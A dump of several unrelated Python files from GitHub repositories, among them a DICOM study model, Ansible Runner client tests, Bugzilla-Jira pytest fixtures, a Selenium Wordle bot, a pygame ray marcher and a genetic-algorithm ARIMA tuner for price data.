self.id,\n 'patientID': self.patientID,\n 'studyUID': self.studyUID,\n 'dateStudy': self.dateStudy,\n 'institutionName': self.institutionName,\n 'patient_id': self.patient_id,\n 'accessionNumber': self.accessionNumber,\n 'protocolName': self.protocolName,\n 'studyDescription': self.studyDescription}\n\n for field_name in self.extended_fields('study'):\n args[field_name] = eval(\"self.\" + eval(\"field_name\"))\n\n return self.add_value_none(include_none, args)\n\n def __repr__(self):\n return \"\" % (self.id, self.studyUID,\n self.patientID, self.dateStudy)\n\n def display(self, data_level=0, file_format='txt', output_console=False,\n csv_text_delimiter=''):\n \"\"\"\n Display or write the data\n\n :param data_level: The level of displaying or writing the data\n\n The possible value:\n\n - ``0`` - key (default)\n - ``1`` - minimal\n - ``2`` - full\n\n :type data_level: int, optional\n :param file_format: The file format\n\n The possible value:\n\n - txt (default)\n - csv\n - json\n\n :type file_format: str, optional\n :param output_console: Display in the console (True | False)\n :type output_console: bool, optional\n :param csv_text_delimiter: Delimiter of csv or txt file\n :type csv_text_delimiter: str, optional\n :return: The concatenate data\n :rtype: str\n \"\"\"\n if file_format == 'txt':\n msg, suffix = self.msg_suffix(data_level)\n if data_level > 1:\n msg += suffix+'id\\t\\t\\t: %s' % self.id\n msg += suffix+'studyUID\\t\\t: %s' % self.studyUID\n else:\n msg += suffix+'%s' % self.studyUID\n if data_level > 0:\n msg += suffix+'patientID\\t\\t: %s' % self.patientID\n msg += suffix+'dateStudy\\t\\t: %s' % self.dateStudy\n msg += suffix+'institutionName\\t: %s' % self.institutionName\n if data_level > 1:\n msg += suffix+'patient_id\\t\\t: %s' % self.patient_id\n msg += suffix+'N series\\t\\t: %s' % len(self.series)\n msg += suffix+'N instances\\t\\t: %s' % len(self.instances)\n elif file_format == 'json':\n return self.json()\n elif file_format == 'csv':\n data = []\n if data_level > 1:\n data.append(self.id)\n data.append(self.studyUID)\n if data_level > 0:\n data.append(self.patientID)\n data.append(self.dateStudy)\n data.append(self.institutionName)\n if data_level > 1:\n data.append(self.patient_id)\n data.append(len(self.series))\n data.append(len(self.instances))\n return ','.join(\n [csv_text_delimiter+str(d)+csv_text_delimiter for d in data])\n if output_console:\n print(msg)\n return msg\n\n @staticmethod\n def header(data_level):\n \"\"\"\n Return the header\n\n :param data_level: The level of displaying the header\n\n The possible value:\n\n - ``0`` - key\n - ``1`` - minimal\n - ``2`` - full\n\n :type data_level: int\n :return: The header\n :rtype: str\n \"\"\"\n head = []\n if data_level > 1:\n head.append('id')\n head.append('studyUID')\n if data_level > 0:\n head.append('patientID')\n head.append('patientID')\n head.append('institutionName')\n if data_level > 1:\n head.append('patient_id')\n head.append('N series')\n head.append('N instances')\n return ','.join(['\"'+h+'\"' for h in head])+'\\n'\n","repo_name":"aphp/SPHERE","sub_path":"sphere/dicmeta/models/base_models/base_study_model.py","file_name":"base_study_model.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"33380674763","text":"import json\nfrom pathlib import Path\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport numpy as np\n\n\nif __name__ == '__main__':\n pictures_dir = Path('pictures/')\n\n try:\n _, filename = sys.argv\n except ValueError:\n print('You must specify filename',\n file=sys.stderr)\n exit(1)\n\n data = json.load(sys.stdin)\n fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2,\n figsize=(10, 4), dpi=200)\n\n t = np.array(list(map(lambda x: x['t'], data)), np.float64)\n x = np.array(data[0]['x'])\n\n density = np.array(\n list(map(lambda x: np.array(x['density'], np.float64), data)))\n pressure = np.array(\n list(map(lambda x: np.array(x['pressure'], np.float64), data)))\n\n density_map = ax1.imshow(\n density[::-1], interpolation='bilinear', norm=LogNorm(vmin=1e-11, vmax=1.5),\n extent=[min(x), max(x), min(t), max(t)], aspect='auto')\n plt.colorbar(density_map, ax=ax1)\n ax1.set_xlabel('Radius')\n ax1.set_ylabel('Density')\n\n pressure_map = ax2.imshow(\n pressure[::-1], interpolation='bilinear', norm=LogNorm(vmin=1e-11, vmax=1.5),\n extent=[min(x), max(x), min(t), max(t)], aspect='auto')\n plt.colorbar(pressure_map, ax=ax2)\n ax2.set_xlabel('Radius')\n ax2.set_ylabel('Pressure')\n\n plt.savefig(pictures_dir.joinpath(filename))\n","repo_name":"DABND19/riemann-solver","sub_path":"color_map.py","file_name":"color_map.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70101641850","text":"import logging\nimport unittest\nimport mock\nimport json\n\nimport requests_mock\n\nfrom requests.exceptions import ConnectionError\n\nfrom ..ansible_runner_svc import Client, PlayBookExecution, ExecutionStatusCode, \\\n API_URL, PLAYBOOK_EXEC_URL, \\\n PLAYBOOK_EVENTS, AnsibleRunnerServiceError\n\n\nSERVER_URL = \"ars:5001\"\nCERTIFICATE = \"\"\n\n# Playbook attributes\nPB_NAME = \"test_playbook\"\nPB_UUID = \"1733c3ac\"\n\n# Playbook execution data file\nPB_EVENTS_FILE = \"./tests/pb_execution_events.data\"\n\n# create console handler and set level to info\nlogger = logging.getLogger()\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter(\"%(levelname)s - %(message)s\")\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\ndef mock_get_pb(mock_server, playbook_name, return_code):\n\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n the_pb_url = \"https://%s/%s/%s\" % (SERVER_URL, PLAYBOOK_EXEC_URL, playbook_name)\n\n if return_code == 404:\n mock_server.register_uri(\"POST\",\n the_pb_url,\n json={ \"status\": \"NOTFOUND\",\n \"msg\": \"playbook file not found\",\n \"data\": {}},\n status_code=return_code)\n elif return_code == 202:\n mock_server.register_uri(\"POST\",\n the_pb_url,\n json={ \"status\": \"STARTED\",\n \"msg\": \"starting\",\n \"data\": { \"play_uuid\": \"1733c3ac\" }},\n status_code=return_code)\n\n return PlayBookExecution(ars_client, playbook_name, logger,\n result_pattern = \"RESULTS\")\n\nclass ARSclientTest(unittest.TestCase):\n\n def test_server_not_reachable(self):\n\n with self.assertRaises(AnsibleRunnerServiceError):\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n status = ars_client.is_operative()\n\n\n def test_server_connection_ok(self):\n\n with requests_mock.Mocker() as mock_server:\n\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n the_api_url = \"https://%s/%s\" % (SERVER_URL,API_URL)\n mock_server.register_uri(\"GET\",\n the_api_url,\n text=\"api\",\n status_code=200)\n\n self.assertTrue(ars_client.is_operative(),\n \"Operative attribute expected to be True\")\n\n def test_server_http_delete(self):\n\n with requests_mock.Mocker() as mock_server:\n\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n url = \"https://%s/test\" % (SERVER_URL)\n mock_server.register_uri(\"DELETE\",\n url,\n json={ \"status\": \"OK\",\n \"msg\": \"\",\n \"data\": {}},\n status_code=201)\n\n response = ars_client.http_delete(\"test\")\n self.assertTrue(response.status_code == 201)\n\nclass PlayBookExecutionTests(unittest.TestCase):\n\n\n def test_playbook_execution_ok(self):\n \"\"\"Check playbook id is set when the playbook is launched\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n self.assertEqual(test_pb.play_uuid, PB_UUID,\n \"Found Unexpected playbook uuid\")\n\n def test_playbook_execution_error(self):\n \"\"\"Check playbook id is not set when the playbook is not present\n \"\"\"\n\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, \"unknown_playbook\", 404)\n\n with self.assertRaises(AnsibleRunnerServiceError):\n test_pb.launch()\n\n #self.assertEqual(test_pb.play_uuid, \"\",\n # \"Playbook uuid not empty\")\n\n def test_playbook_not_launched(self):\n \"\"\"Check right status code when Playbook execution has not been launched\n \"\"\"\n\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n # Check playbook not launched\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.NOT_LAUNCHED,\n \"Wrong status code for playbook not launched\")\n\n def test_playbook_launched(self):\n \"\"\"Check right status code when Playbook execution has been launched\n \"\"\"\n\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_status_url = \"https://%s/%s/%s\" % (SERVER_URL,\n PLAYBOOK_EXEC_URL,\n PB_UUID)\n mock_server.register_uri(\"GET\",\n the_status_url,\n json={\"status\": \"OK\",\n \"msg\": \"running\",\n \"data\": {\"task\": \"Step 2\",\n \"last_task_num\": 6}\n },\n status_code=200)\n\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.ON_GOING,\n \"Wrong status code for a running playbook\")\n\n self.assertEqual(test_pb.play_uuid, PB_UUID,\n \"Unexpected playbook uuid\")\n\n def test_playbook_finish_ok(self):\n \"\"\"Check right status code when Playbook execution is succesful\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_status_url = \"https://%s/%s/%s\" % (SERVER_URL,\n PLAYBOOK_EXEC_URL,\n PB_UUID)\n mock_server.register_uri(\"GET\",\n the_status_url,\n json={\"status\": \"OK\",\n \"msg\": \"successful\",\n \"data\": {}\n },\n status_code=200)\n\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.SUCCESS,\n \"Wrong status code for a playbook executed succesfully\")\n\n def test_playbook_finish_error(self):\n \"\"\"Check right status code when Playbook execution has failed\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_status_url = \"https://%s/%s/%s\" % (SERVER_URL,\n PLAYBOOK_EXEC_URL,\n PB_UUID)\n mock_server.register_uri(\"GET\",\n the_status_url,\n json={\"status\": \"OK\",\n \"msg\": \"failed\",\n \"data\": {}\n },\n status_code=200)\n\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.ERROR,\n \"Wrong status code for a playbook with error\")\n\n def test_playbook_get_result(self):\n \"\"\" Find the right result event in a set of different events\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_events_url = \"https://%s/%s\" % (SERVER_URL,\n PLAYBOOK_EVENTS % PB_UUID)\n\n # Get the events stored in a file\n pb_events = {}\n with open(PB_EVENTS_FILE) as events_file:\n pb_events = json.loads(events_file.read())\n\n mock_server.register_uri(\"GET\",\n the_events_url,\n json=pb_events,\n status_code=200)\n\n result = test_pb.get_result(\"runner_on_ok\")\n\n self.assertEqual(len(result.keys()), 1,\n \"Unique result event not found\")\n\n self.assertIn(\"37-100564f1-9fed-48c2-bd62-4ae8636dfcdb\",\n result.keys(),\n \"Predefined result event not found\")\n","repo_name":"OpenMPDK/KVCeph","sub_path":"src/pybind/mgr/ansible/tests/test_client_playbooks.py","file_name":"test_client_playbooks.py","file_ext":"py","file_size_in_byte":9456,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"77"} +{"seq_id":"36538038054","text":"\"\"\"\nModule for setting up pytest fixtures\n\"\"\"\nimport time\nfrom unittest import mock\n\nimport pytest\nimport responses\nfrom fastapi.testclient import TestClient\n\nfrom jbi import Operation\nfrom jbi.app import app\nfrom jbi.configuration import get_actions\nfrom jbi.environment import Settings\nfrom jbi.models import (\n Action,\n ActionContext,\n Actions,\n BugzillaWebhookComment,\n BugzillaWebhookRequest,\n)\nfrom jbi.services import bugzilla, jira\nfrom tests.fixtures import factories\n\n\n@pytest.fixture(autouse=True)\ndef mocked_statsd():\n with mock.patch(\"jbi.services.common.statsd\") as _mocked_statsd:\n yield _mocked_statsd\n\n\n@pytest.fixture\ndef anon_client():\n \"\"\"A test client with no authorization.\"\"\"\n return TestClient(app)\n\n\n@pytest.fixture\ndef settings():\n \"\"\"A test Settings object\"\"\"\n return Settings()\n\n\n@pytest.fixture(autouse=True)\ndef actions():\n get_actions.cache_clear()\n return get_actions()\n\n\n@pytest.fixture(autouse=True)\ndef mocked_bugzilla(request):\n if \"no_mocked_bugzilla\" in request.keywords:\n yield None\n bugzilla.get_client.cache_clear()\n else:\n with mock.patch(\"jbi.services.bugzilla.BugzillaClient\") as mocked_bz:\n yield mocked_bz()\n bugzilla.get_client.cache_clear()\n\n\n@pytest.fixture(autouse=True)\ndef mocked_jira(request):\n if \"no_mocked_jira\" in request.keywords:\n yield None\n jira.get_client.cache_clear()\n else:\n with mock.patch(\"jbi.services.jira.JiraClient\") as mocked_jira:\n yield mocked_jira()\n jira.get_client.cache_clear()\n\n\n@pytest.fixture\ndef mocked_responses():\n with responses.RequestsMock() as rsps:\n yield rsps\n\n\n@pytest.fixture\ndef context_create_example() -> ActionContext:\n return factories.action_context_factory(\n operation=Operation.CREATE,\n )\n\n\n@pytest.fixture\ndef context_update_example() -> ActionContext:\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"]\n )\n context = factories.action_context_factory(\n operation=Operation.UPDATE,\n bug=bug,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef context_update_status_assignee() -> ActionContext:\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"]\n )\n changes = [\n {\n \"field\": \"status\",\n \"removed\": \"OPEN\",\n \"added\": \"FIXED\",\n },\n {\n \"field\": \"assignee\",\n \"removed\": \"nobody@mozilla.org\",\n \"added\": \"mathieu@mozilla.com\",\n },\n ]\n event = factories.webhook_event_factory(routing_key=\"bug.modify\", changes=changes)\n context = factories.action_context_factory(\n operation=Operation.UPDATE,\n bug=bug,\n event=event,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef context_comment_example() -> ActionContext:\n user = factories.webhook_user_factory(login=\"mathieu@mozilla.org\")\n comment = BugzillaWebhookComment.parse_obj({\"number\": 2, \"body\": \"hello\"})\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"],\n comment=comment,\n )\n event = factories.webhook_event_factory(target=\"comment\", user=user)\n context = factories.action_context_factory(\n operation=Operation.COMMENT,\n bug=bug,\n event=event,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef context_update_resolution_example() -> ActionContext:\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"]\n )\n event = factories.webhook_event_factory(\n action=\"modify\", routing_key=\"bug.modify:resolution\"\n )\n context = factories.action_context_factory(\n operation=Operation.UPDATE,\n bug=bug,\n event=event,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef webhook_create_example() -> BugzillaWebhookRequest:\n webhook_payload = factories.webhook_factory()\n\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_comment_example() -> BugzillaWebhookRequest:\n user = factories.webhook_user_factory(login=\"mathieu@mozilla.org\")\n comment = BugzillaWebhookComment.parse_obj({\"number\": 2, \"body\": \"hello\"})\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"],\n comment=comment,\n )\n event = factories.webhook_event_factory(target=\"comment\", user=user)\n webhook_payload = factories.webhook_factory(bug=bug, event=event)\n\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_private_comment_example() -> BugzillaWebhookRequest:\n user = factories.webhook_user_factory(login=\"mathieu@mozilla.org\")\n event = factories.webhook_event_factory(target=\"comment\", user=user)\n bug = factories.bug_factory(\n comment={\"id\": 344, \"number\": 2, \"is_private\": True},\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"],\n )\n webhook_payload = factories.webhook_factory(bug=bug, event=event)\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_create_private_example() -> BugzillaWebhookRequest:\n return factories.webhook_factory(\n event=factories.webhook_event_factory(),\n bug={\"id\": 654321, \"is_private\": True},\n )\n\n\n@pytest.fixture\ndef webhook_change_status_assignee():\n changes = [\n {\n \"field\": \"status\",\n \"removed\": \"OPEN\",\n \"added\": \"FIXED\",\n },\n {\n \"field\": \"assignee\",\n \"removed\": \"nobody@mozilla.org\",\n \"added\": \"mathieu@mozilla.com\",\n },\n ]\n event = factories.webhook_event_factory(routing_key=\"bug.modify\", changes=changes)\n webhook_payload = factories.webhook_factory(event=event)\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_modify_private_example() -> BugzillaWebhookRequest:\n event = factories.webhook_event_factory(\n action=\"modify\", routing_key=\"bug.modify:status\"\n )\n webhook_payload = factories.webhook_factory(\n bug={\"id\": 654321, \"is_private\": True}, event=event\n )\n return webhook_payload\n\n\n@pytest.fixture\ndef action_factory() -> Action:\n return factories.action_factory\n\n\n@pytest.fixture\ndef action_example() -> Action:\n return factories.action_factory()\n\n\n@pytest.fixture\ndef actions_example(action_example) -> Actions:\n return Actions.parse_obj([action_example])\n\n\n@pytest.fixture(autouse=True)\ndef sleepless(monkeypatch):\n # https://stackoverflow.com/a/54829577\n monkeypatch.setattr(time, \"sleep\", lambda s: None)\n\n\n@pytest.fixture\ndef exclude_middleware():\n # Hack to work around issue with Starlette issue on Jinja templates\n # https://github.com/encode/starlette/issues/472#issuecomment-704188037\n user_middleware = app.user_middleware.copy()\n app.user_middleware = []\n app.middleware_stack = app.build_middleware_stack()\n yield\n app.user_middleware = user_middleware\n app.middleware_stack = app.build_middleware_stack()\n","repo_name":"grahamalama/jira-bugzilla-integration","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"29079587924","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport worle_solver\n\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\nbrowser = webdriver.Chrome(options=options, service=Service(ChromeDriverManager().install()))\n\n\n###########################################################\n# GGGGG L OOOO BBBB AAA L\n# G L O O B B A A L\n# G L O O BBBBB A A L\n# G GG L O O B B AAAAA L\n# G G L O O B B A A L\n# GGGGG LLLLLL OOOO BBBBB A A LLLLLL\n###########################################################\n\ntron = worle_solver.solver()\n\n# [*tron.getGuess()]\n\nxbase = '/html/body/div/div[1]/div/div[row]'\n\n###########################################################\n\n\ndef send_word(word):\n\n ActionChains(browser) \\\n .send_keys(word) \\\n .key_down(Keys.ENTER) \\\n .key_up(Keys.ENTER) \\\n .perform()\n time.sleep(2)\n\n return\n\ndef check(row): #eliminates absent letters from letters[], does nothing to correct letters, and returns a dictionary of 'present' letters with indexes\n\n path = '/html/body/div/div[1]/div/div[' + str(row) + ']/div[BUTTON]/div'\n\n #checks data-state's of each letter\n for i in range (0, 5):\n\n buttonpath = path.replace('BUTTON', str(i+1)) #i+1 because html xpath div's are 1 indexed\n\n state = browser.find_element(By.XPATH, buttonpath).get_attribute('data-state')\n\n if state == 'absent':\n tron.setGuess('tests')\n elif state == 'present':\n continue #temp\n elif state == 'correct':\n continue #temp\n \n #return \n\ndef solve(row = 1): #will probably be done recursively,\n\n if (row > 6): #base case, row will be incremented from 1 to 7 and at 7 will return\n print('bruh')\n return\n else:\n \n #rowpath = By.XPATH(xbase.replace('row', str(row)))\n\n word_string = \"\"\n\n\n #because for some reason python string .join(letters) was returning blank\n #for i in [*tron.getGuess()]: \n # word_string += i\n\n print(tron.getGuess())\n send_word(tron.getGuess())\n #present = check(row)\n #print(present)\n check(row)\n \n row+=1\n\n solve(row)\n \n \n\n\n\n\n\n\n\n\n\ndef script():\n \n #path only needed to check letter correctness\n\n #html/body/whole site/board container/whole board/single row/single letter box\n\n browser.get('https://www.nytimes.com/games/wordle/index.html')\n\n time.sleep(1)\n\n xButton = browser.find_element(By.XPATH, '/html/body/div/div[3]/div/div')\n\n xButton.click()\n\n time.sleep(1)\n\n solve()\n\nscript()","repo_name":"SouthUniform7/wordLEbot","sub_path":"worLE.py","file_name":"worLE.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15671393328","text":"import pygame\nfrom constants import *\nfrom math import cos, sin\nfrom utils import *\n\nclass Ray:\n def __init__(self, x, y, angle, color):\n self.position = [x, y]\n self.angle = angle\n self.color = color\n\n self.x_pos = 0\n self.y_pos = 0\n self.collsions = []\n \n def March(self, obstacles, collisions, screen):\n counter = 0\n current_pos = self.position\n # Draw origin\n pygame.draw.circle(screen, ORANGE, self.position, 5)\n\n while counter < 100:\n record = 2000\n closest = None\n for obstacle in obstacles:\n distance = SignedDistance(current_pos, obstacle, obstacle.radius)\n if distance < record:\n record = distance\n closest = obstacle\n \n if record < 1:\n collisions.insert(0, (int(current_pos[0]), int(current_pos[1])) )\n break\n\n self.x_position = current_pos[0] + cos(self.angle) * record\n self.y_position = current_pos[1] + sin(self.angle) * record\n\n aX = current_pos[0] + cos(self.angle) * record\n aY = current_pos[1] + sin(self.angle) * record\n\n pygame.draw.circle(screen, GREEN, (int(current_pos[0]), int(current_pos[1])), abs(int(record)), 1)\n pygame.draw.line(screen, self.color, (self.position[0], self.position[1]), (aX, aY), 4)\n\n current_pos[0] = aX\n current_pos[1] = aY\n\n pygame.draw.circle(screen, self.color, (int(self.x_pos), int(self.y_pos)), 4)\n\n closest.draw(screen, LIGHT_ORANGE)\n\n if offScreen([self.x_pos, self.y_pos], WIDTH, HEIGHT):\n break\n if offScreen(current_pos, WIDTH, HEIGHT):\n break\n \n counter += 1\n\n","repo_name":"Josephbakulikira/24-project-with-pygame---for-beginners","sub_path":"29-2DRaymarching/ray.py","file_name":"ray.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"27883379957","text":"def binary(numbers, target):\n first = 0\n last = len(numbers)-1\n found = False\n\n while(first <= last and not found):\n mid = (first + last)//2\n if numbers[mid] == target:\n found = True\n else:\n if target < numbers[mid]:\n last = mid-1\n else:\n first = mid+1\n \n return found","repo_name":"winarcooo/DSA-Learning","sub_path":"binarysearch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1006992782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 20:34:44 2021\n\nHay que ejecutar cada función por separado primero y luego llamar a la función, si no se hace así dará un error en ajusta_y_predice_1.\n\n@author: Usuario\n\"\"\"\n\n# Librerías\n\n# Numpy\nimport numpy as np \n# Matplotlib\nimport matplotlib.pyplot as plt\n# Pandas\nimport pandas as pd \n# Statsmodels\nfrom statsmodels.tsa.arima.model import ARIMA\n# Yfinance\nimport yfinance as yf \n# Plotly\n#import plotly.graph_objects as go\n\n# Time\nimport time\n\n# Concurrent.futures\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Genetic algorithms\n\nimport random\nfrom deap import base, creator, tools, algorithms\n\n# To locate the plots:\nfrom IPython import get_ipython\n\n# To accelerate the process:\n\ndef yf_data_ETL_7d1m(active_name): \n \n '''\n Le pasas el nombre del activo y extrae un dataset con los valores del mismo para cada minuto durante \n los últimos siete días. Ejemplos: 'EURUSD=X', 'BTC-USD', etc. Luego divide ese dataset en uno de \n entrenamiento y otro testeo.\n '''\n \n data = yf.download(tickers=active_name, period='7d', interval='1m', progress=False)\n df = pd.DataFrame(data=data)\n train_data, test_data = df[0:int(len(df)*0.8)], df[int(len(df)*0.8):]\n \n return df, train_data, test_data\n\ndef ajusta_y_predice1(history, p, d, q):\n model = ARIMA(history, order=(p,d,q)) # p (lags) = 5, d (grado de diferenciación: corresponde a las d diferencias que son necesarias para convertir la serie de datos original en una estacionaria) = 1, q (orden de medias móviles usado) = 0. Tengo que justificar los dos últimos parámetros.\n model_fit = model.fit() # Entrenamos el modelo. disp = False indica que no hay que devolver un mensaje con los parámetros del modelo para cada iteración.\n output = model_fit.forecast() # Predecimos los siguientes valores a partir del modelo entrenado.\n return output[0]\n\ndef transforma_binario_a_integer(individuo):\n numero_binario = '0b'+str(individuo).replace('[','').replace(']','').replace(',','').replace(' ','')\n return (int(numero_binario, 2)) # OJO CON ESTA LINEA QUE ES CLAVE!\n\n#print('El valor real para este momento fue: ', test_ar[0])\n#print('La predicción es: ', prediccion[0])\n\n# df, train_data, test_data = yf_data_ETL_7d1m('BTC-USD')\n\n\n\n\ndef optimiza_ARIMA_params(history, test_ar, poblacion = 32, prob_cruce = 0.5, prob_muta_ind = 0.4, prob_muta_gen = 0.4, torneo = 3): \n \n start_time = time.time()\n \n def evalOneMin(individuo):\n \n # global history\n # global test_ar\n \n pbin = individuo[:3]\n dbin = individuo[3:5]\n qbin = individuo[5:7]\n \n p = transforma_binario_a_integer(pbin)\n d = transforma_binario_a_integer(dbin)\n q = 2 #transforma_binario_a_integer(qbin)\n \n print(' p = ',p, ', d = ', d, ', q = ', q, '\\n\\t#-- Done --#')\n \n prediction = ajusta_y_predice1(history, p, d, q)\n \n dif_to_min = np.abs(test_ar[0] - prediction) # Lo doy en tanto por 1 para tener más claro la diferencia de partida que poner (1 es mucho en este caso, por ejemplo).\n # dif_to_min\n #best_dif = 1 # Partimos de que la predicción sea 2 veces tan grande como la observación, lo que es una diferencia bastante grande comparada con las predicciones que he visto al aplicar el método.\n # if dif_to_min < best_dif:\n # best_dif = dif_to_min\n \n return dif_to_min,\n \n # global history\n # global test_ar\n \n creator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,)) # Observese que esto es un problema de minimizacion\n creator.create(\"Individual\", list, fitness=creator.FitnessMin) # Observese que esto es un problema de minimizacion\n \n toolbox = base.Toolbox()\n toolbox.register(\"attr_float\", random.randint, 0, 1)\n toolbox.register(\"individual\", tools.initRepeat, creator.Individual, toolbox.attr_float, n=7)\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n \n toolbox.register(\"evaluate\", evalOneMin) # Registrar aqui la funcion de evaluacion\n toolbox.register(\"mate\", tools.cxTwoPoint)\n toolbox.register(\"mutate\", tools.mutFlipBit, indpb=prob_muta_gen)\n toolbox.register(\"select\", tools.selTournament, tournsize=torneo)\n \n def main():\n \n global history\n global test_ar\n \n #import numpy\n \n pop = toolbox.population(n=poblacion) # Para 16 valores de p, 8 de d y 1 de q, hay 128 combinaciones posibles.\n hof = tools.HallOfFame(1)\n \n # with ThreadPoolExecutor(8) as exe:\n \n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", np.mean)\n stats.register(\"min\", np.min)\n stats.register(\"max\", np.max)\n \n pop, logbook = algorithms.eaSimple(pop, toolbox, cxpb=prob_cruce, mutpb=prob_muta_ind, ngen=3, stats=stats, halloffame=hof, verbose=True)\n \n return pop, logbook, hof\n \n # if __name__ == \"__main__\":\n \n pop, log, hof = main()\n print(\"Best individual is: %s\\nwith fitness: %s\" % (hof[0], hof[0].fitness))\n print(\"El valor de p ha sido: \", transforma_binario_a_integer((hof[0])[0:3]))\n print(\"El valor de d ha sido: \", transforma_binario_a_integer((hof[0])[3:5]))\n print(\"El valor de q ha sido: \", 2) #transforma_binario_a_integer((hof[0])[5:7])\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n gen, avg, min_, max_ = log.select(\"gen\", \"avg\", \"min\", \"max\")\n \n get_ipython().run_line_magic('matplotlib', 'inline')\n plt.plot(gen, avg, label=\"average\")\n plt.plot(gen, min_, label=\"minimum\")\n plt.plot(gen, max_, label=\"maximum\")\n plt.xlabel(\"Generation\")\n plt.ylabel(\"Fitness\")\n plt.legend(loc=\"lower right\")\n plt.show()\n \n ind_usado = hof[0]\n \n return ind_usado, poblacion, prob_cruce, prob_muta_ind, prob_muta_gen, torneo,\\\n history, transforma_binario_a_integer((hof[0])[0:3]),\\\n transforma_binario_a_integer((hof[0])[3:5]), 2 #transforma_binario_a_integer((hof[0])[5:7])\n \n\n# ## Esta línea habría que cambiarla por la carga de datos desde SQL:\n# df = pd.read_csv(r'C:\\Users\\Usuario\\.spyder-py3\\Trabajo_Data_Science\\try1.csv')\n# ##\n\n# df.set_index('Datetime')\n# train_data, test_data = df[0:int(len(df)*0.8)], df[int(len(df)*0.8):]\n \n# train_ar = train_data['Open'].values\n# history = [x for x in train_ar]\n\n# # Creamos un array con los valores de testeo que vamos a usar:\n\n# test_ar = test_data['Open'].values \n\n# combina = optimiza_ARIMA_params(history, test_ar)\n# print(combina)\n\n # Es mejor no coger, a la vez, valores de p y de q mayores que 1. https://people.duke.edu/~rnau/411arim.htm\n \n # Combinaciones obtenidas para un dataset cambiante:\n \n # 6,2,0 128 